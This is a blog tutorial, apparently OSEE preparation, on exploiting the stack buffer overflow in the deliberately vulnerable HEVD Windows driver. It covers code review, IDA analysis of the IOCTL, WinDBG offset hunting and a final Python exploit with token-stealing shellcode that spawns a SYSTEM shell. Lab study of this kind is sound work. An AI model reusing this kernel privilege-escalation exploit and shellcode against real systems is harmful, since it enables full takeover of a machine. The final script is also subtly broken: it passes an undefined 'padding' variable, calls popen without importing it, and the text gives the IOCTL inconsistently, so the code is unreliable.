HEVD Windows Kernel Exploitation 2 – Stack Overflow

After preparing for OSEE over a year and finishing almost most of the topics for the previous years syllabus, I finally found the time to start writing a blog series about all the learning I had so far (and more to come as this is a long journey). We’ll be focusing on Kernel Exploitation for various techniques using this incredible source: HEVD a vulnerable driver: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

Here’s the structure of the exploit we’ll be using:

  • Source Code Review
  • Analysis with IDA and finding IOCTL
  • Crafting the initial Exploit
  • Token Stealing & Assembly Code Manual Analysis
  • Final Exploit and Spawn the Shell!

Alright, so each section will include the most important tips and tricks merged with a bit of theory. I’ll try to keep it not too long as the topic is hard to digest already (remind me these words in the more complex techniques later 😛) So let’s get started!

Source Code Review:

Go to the source code file BufferOverflowStack.c: (I’m using 2.0 version of HEVD, for the earlier version, the names of the files can change)

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/BufferOverflowStack.c

So let’s go through the code to analyze:

The structure of the code is as below:

// verify if the buffer resides in user mode
ifdef SECURE 
// RtlCopyMemory Secure function
else
// RtlCopyMemory Vulnerable function
endif
// throw exception if something is wrong
IoctlHandler()
//TriggerBufferOverflowStack function

So let’s see each section of the source code:

// verify if the buffer resides in user mode

__declspec(safebuffers)
NTSTATUS
TriggerBufferOverflowStack(
    _In_ PVOID UserBuffer,
    _In_ SIZE_T Size
)
{
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG KernelBuffer[BUFFER_SIZE] = { 0 };
    PAGED_CODE();
    __try
    {
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));
        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%zX\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));

Secure implementation of the function RtlCopyMemory(): This is secure because the developer is passing a size equal to size of KernelBuffer to RtlCopyMemory()/memcpy().

#ifdef SECURE

RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, sizeof(KernelBuffer));

Vulnerable implementation of the function RtlCopyMemory(): This is a vanilla Stack based Overflow vulnerability because the developer is passing the user supplied size directly to RtlCopyMemory()/memcpy() without validating if the size is greater or equal to the size of KernelBuffer

#else
DbgPrint("[+] Triggering Buffer Overflow in Stack\n");
RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, Size);

Then we have the IoctlHandler(). Let’s see what’s going on with this code block:

  • If the correct IOCTL code makes it to the BufferOverflowStackIoctlHandler(), a UserBuffer (accepts user input) and a Size (user buffer size) parameter are available. 
  • Then TriggerBufferOverflowStack() function will be triggered by passing UserBuffer and Size. (where the vulnerability exist via the RtlCopyMemory() function)
NTSTATUS
BufferOverflowStackIoctlHandler(
    _In_ PIRP Irp,
    _In_ PIO_STACK_LOCATION IrpSp
)
{
    SIZE_T Size = 0;
    PVOID UserBuffer = NULL;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    UNREFERENCED_PARAMETER(Irp);
    PAGED_CODE();

    UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;
    Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;

    if (UserBuffer)
    {
        Status = TriggerBufferOverflowStack(UserBuffer, Size);
    }

    return Status;
}

Now it’s time to get into more theory with IOCTL:

## Theory for 2 Windows API functions we’ll use: CreateFileA() and DeviceIoControl()

Device drivers are kernel mode objects meaning:

handle = kernel32.CreateFileA(“\\\\.\\HackSysExtremeVulnerableDriver”, 0xC0000000, 0, None, 0x3, 0, None)

After obtaining the handle to the device driver, we then can utilize IOCTLs (I/O control codes) via IRPS (I/O request packets).

Windows API function DeviceIOControl is used for user mode apps to communicate with kernel mode drivers. (https://docs.microsoft.com/en-us/windows/win32/api/ioapiset/nf-ioapiset-deviceiocontrol)

The first argument of the function is the handle to the device driver.

kernel32.DeviceIoControl(<handle>, <IOCTL-code>, padding, len(padding), None, 0, byref(c_ulong()), None)

Both of these functions are located in kernel32.dll. In summary we use the following functions for the following reasons:

CreateFileA(): to create a handle to an I/O device.

DeviceIoControl(): We’ll use the handle created via CreateFileA() function as the first parameter and we’ll access the kernel mode object.

Analysis with IDA

Let’s open up the HEVD.sys driver file loaded with OSRLOADER earlier. Take a look at the functions present:

Let’s take a look at the IrpDeviceIoCtlHandler() function, which handles IRP requests with IOCTLs. As IRP will travel until it finds the applicable IOCTL, you’ll see many IOCTLs here:

Let’s see the BufferOverflowStackIoctlHandler() function:

You see a “jump if zero” instruction which references the above instruction of sub eax, 0x222003h.
If that instruction ends up with zero, we’ll go to the BufferOverflowStackIoctlHandler() function which will trigger a stack overflow condition by passing our IOCTL provided.

When we scroll up, we see the following lines:

This means if we send a value of 0x2223003h as our IOCTL in our proof of concept, we can trigger the vulnerable code.

Looking at the StackOverflowIoctlHandler() function, we eventually will land in the TriggerStackOverflow() function. Let’s see what is contained in that function:

800 hex bytes (2048 bytes) is the length of the KernelBuffer.

So anything over 2048 bytes will crash the kernel, resulting in a BSOD (blue screen of death).

Exploit Version 1:

Our script structure will look like the following:

# imports for python
# create handle with CreateFileA() function
# throw exception if cannot get IOCTL handle
# buffer and shellcode
# DeviceIoControl() with the correct IOCTL and the handle

HackSysExtremeVulnerableDriver.c is responsible for creating the device, as we can see below:

This means that we will use the path of \\.\HackSysExtremeVulnerableDriver within a call to CreateFile to open a handle for communication in our pwith the following format:

handle = kernel32.CreateFileA( “\\\\.\\HackSysExtremeVulnerableDriver“, …)

import struct, sys, os
from ctypes import *

kernel32 = windll.kernel32
handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not handle or handle == -1:
    print "[+] Cannot get device handle."
    sys.exit(0)

# EIP overwrite
padding = "\x41" * 2080
padding += "\x42" * 4
padding += "\x43" * (3000 - len(padding))

# 0x222003 is the IOCTL code
kernel32.DeviceIoControl(handle, 0x222003, padding, len(padding), None, 0, byref(c_ulong()), None)

Let’s verify the EIP overwrite with WinDBG:

!sym noisy
ed nt!Kd_Default_Mask 8
.reload

Verify if the HEVD is loaded with the following command: lm m H*

Then, execute g in the command window to let the Debugee run, so we can execute the PoC.

Run the python script we just wrote above:

Verify if we overwrite the EIP with the following command: r

Pass through the crash: Debug > Go Unhandled Exception and then type g again to execute.

We get the BSOD – and the 42424242 value of EIP:

So the first part was the initial foothold 😁 Now we can actually start the exploitation:

Token Stealing

That one of the techniques we can use here. We need to escalate our privileges to NT AUTHORITY \ SYSTEM. In order to do that, we’ll write a piece of shellcode that will copy a token with the system privileges to the target process. (cmd.exe)

First of all, the sample payload is provided to us by HackSysExtreme:

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Exploit/Payloads.c

What the heck does this mean you may say to yourself. Well, I’ll try to explain it all. Here’s the purpose of this code:

pushad                              
xor eax, eax                         
mov eax, fs:[eax + KTHREAD_OFFSET]   
mov eax, [eax + EPROCESS_OFFSET]     
mov ecx, eax                         
mov edx, SYSTEM_PID                  

SearchSystemPID:
    mov eax, [eax + FLINK_OFFSET]    
    sub eax, FLINK_OFFSET
    cmp [eax + PID_OFFSET], edx      
    jne SearchSystemPID
mov edx, [eax + TOKEN_OFFSET]        
mov [ecx + TOKEN_OFFSET], edx                  
popad 
  • Extract the offset to the process and find the following 2 values:
    • _KTHREAD_OFFSET
    • _EPROCESS_OFFSET
  • Find the ActiveProcessLinks with the SearchSystemPID function
  • Find the token (the last 2 mov instructions)

In order to find these values, we’ll use WinDBG. We’ll use the command syntax: dt n!_* for each data structure.

We’re going to start analyzing _KPRC which stands for Kernel Processor Region. This data structure contains a lot of information. We’ll target specifically what we are looking for. The map to the values looks like the following:

  • _KPRC
    • _KPRCB
      • _KTHREAD
        • _KAPC_STATE
          • _KPROCESS
            • ActiveProcessLinks
            • Token

So let’s get started:

kd> dt nt!_KPRC

Scroll down until you see _KPRCB. It’s +0x120 bytes away from _KPRC.

kd> dt nt!_KPRCB

You’ll see _KTHREAD which is +0x004 bytes away from _KPRCB. Meaning _KTHREAD is +0x124 bytes away from _KPRC.

In the assembly code, we will use fs segment register to access the data structure.

mov eax, fs:[eax + KTHREAD_OFFSET]   

In order to find the offset of _EPROCESS of the current thread, we’ll go through the same logic:

kd> dt nt!_KTHREAD

Scroll down until you see _KAPC_STATE. It’s +0x040 bytes away from _KTHREAD.

kd> dt nt!_KAPC_STATE

You’ll see _KPROCESS is +0x010 away from _KAPC_STATE which make is +0x050 bytes away from _KTHREAD.

mov eax, [eax + EPROCESS_OFFSET]     

Cool, now we need to find the token of the current process. Let’s find the values with the same logic:

kd> dt nt!_EPROCESS

See that ActiveProcessLinks is +0x0b8 bytes away from _EPROCESS and Token is +0x0f8 bytes away from _EPROCESS.

Last step is list all of the current processes with the following command:

kd> process 0 0

Look for a system process and pass the PID with the following command:

kd> <pid> 1

This will reveal the SYSTEM process access token. We will copy this token to our own cmd.exe which will give us NT AUTHORITY\SYSTEM

Let’s rewrite the assembly code with the known offsets and values:

  • _KTHREAD offset from _KPCR: 0x124
  • _EPROCESS offset from from _KTHREAD: 0x50
  • ActiveProcessLinks from _EPROCESS: 0x0b8
  • Token from _EPROCESS: 0x0f8
pushad                              
xor eax, eax                         
mov eax, fs:[eax+0x124]   
mov eax, [eax+0x50]     
mov ecx, eax                         
mov edx, 0x4  ;PID for Win7                  

mov eax, [eax+0xb8]    
sub eax,0xb8
cmp [eax+0xb4], edx      
jnz 0x1a

mov edx, [eax + 0xf8]        
mov [ecx + 0xf8], edx                  
popad
pop ebp ;restore the base pointer
ret 0x8 ;return and clear the next 8 bytes

Let’s write our final code with one more additions:

We’ll Bypass DEP with VirtualAlloc. We’ll allocate RWX region and copy our shellcode to the newly allocated RWX region

# Bypass DEP with VirtualAlloc 
# Allocate RWX region for shellcode
pointer = kernel32.VirtualAlloc(c_int(0),c_int(len(payload)),c_int(0x3000),c_int(0x40))
buf = (c_char * len(payload)).from_buffer(payload)

# Copy shellcode to newly allocated RWX region
kernel32.RtlMoveMemory(c_int(pointer),buf,c_int(len(payload)))
shellcode = struct.pack("<L",pointer)

Final Script:

import struct, sys, os
from ctypes import *

kernel32 = windll.kernel32
handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)

if not handle or handle == -1:
    print "[+] Cannot get device handle."
    sys.exit(0)

payload = ""
payload += bytearray(
    "\x60"                            # pushad
    "\x31\xc0"                        # xor eax,eax
    "\x64\x8b\x80\x24\x01\x00\x00"    # mov eax,[fs:eax+0x124]
    "\x8b\x40\x50"                    # mov eax,[eax+0x50]
    "\x89\xc1"                        # mov ecx,eax
    "\xba\x04\x00\x00\x00"            # mov edx,0x4
    "\x8b\x80\xb8\x00\x00\x00"        # mov eax,[eax+0xb8]
    "\x2d\xb8\x00\x00\x00"            # sub eax,0xb8
    "\x39\x90\xb4\x00\x00\x00"        # cmp [eax+0xb4],edx
    "\x75\xed"                        # jnz 0x1a
    "\x8b\x90\xf8\x00\x00\x00"        # mov edx,[eax+0xf8]
    "\x89\x91\xf8\x00\x00\x00"        # mov [ecx+0xf8],edx
    "\x61"                            # popad
    "\x5d"                            # pop ebp
    "\xc2\x08\x00"                    # ret 0x8
)

# Defeating DEP with VirtualAlloc 
# Allocate RWX region for shellcode
pointer = kernel32.VirtualAlloc(c_int(0),c_int(len(payload)),c_int(0x3000),c_int(0x40))
buf = (c_char * len(payload)).from_buffer(payload)

# Copy shellcode to newly allocated RWX region
kernel32.RtlMoveMemory(c_int(pointer),buf,c_int(len(payload)))
shellcode = struct.pack("<L",pointer)

# EIP overwrite
buffer = "A" * 2080 + shellcode

# 0x222003 is the IOCTL code
kernel32.DeviceIoControl(handle, 0x222003, padding, len(padding), None, 0, byref(c_ulong()), None)

popen("start cmd", shell= True)